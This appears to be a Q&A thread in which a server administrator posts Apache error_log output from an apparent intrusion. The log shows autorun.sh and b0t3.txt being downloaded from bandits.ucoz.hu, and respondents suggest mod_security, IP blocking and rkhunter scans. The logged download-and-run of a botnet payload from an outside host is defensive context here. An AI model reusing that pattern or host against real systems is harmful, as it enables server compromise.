1

I'm facing problem with apache. Following logs are showing in error_log file.

--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

     0K                                                       100% 51.6M=0s

15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: `b0t3.txt'

     0K .......... .......... ........                        100% 8.75M=0.003s

15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

     0K                                                       100% 31.8M=0s

15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0

How can i prevent to this issue?

user9517
  • 115,471
  • 20
  • 215
  • 297
User4283
  • 781
  • 3
  • 10
  • 27

2 Answers2

2

seems someone tried to download and running perl script using one of your webpage that might be vulnerable. - tried to disabled execution all interpreter (perl, phyton, curl, c, etc).

  • i assume it could be apache + php, if yes, you may be disabled: allow_url_fopen = Off, to disable downloads via PHP.

  • add httpd mod_security

  • fixed your vulnerable web page script
  • open outgoing firewall for certain ips/ports
chocripple
  • 2,109
  • 14
  • 9
  • I'll do and update accordingly... Thanks for the suggestion as I'm too much disturbed due to this happen – User4283 Jul 19 '11 at 14:32
  • 2
    This is only the tip of the iceberg. Someone has deployed malicious code on your server, is able to invoke it remotely and at least some of it is running on your server. Some of what they are deploying is written in perl - but this part is failing. Kudos to User4283 for finding the problem - but fixing it is a lot more complicated than Rikih seems to be imply. As above the hacker has got past 3 hurdles already – symcbean Jul 19 '11 at 14:38
  • I've added HTTPD mod_security as well as scan system with rkhunter and applied the suggestion on my server given by rkhunter. rkhunter did not find any root-kit. Any other suggestion or help? – User4283 Jul 19 '11 at 18:18
1

You have a script somewhere reaching out to grab what looks like a botnet script, trying to save it & executle locally. which is not happening as it is inthe error file.

  • block the bandits ip [though there are probably several more]
  • find that script [grep for the bandits url]
  • find out what that script is using to retrieve the file [block it if you can]

  • download & scan with rkhunter

  • watch your mail queue
  • watch for odd things in your process list

-sean

Sean Kimball
  • 869
  • 1
  • 8
  • 24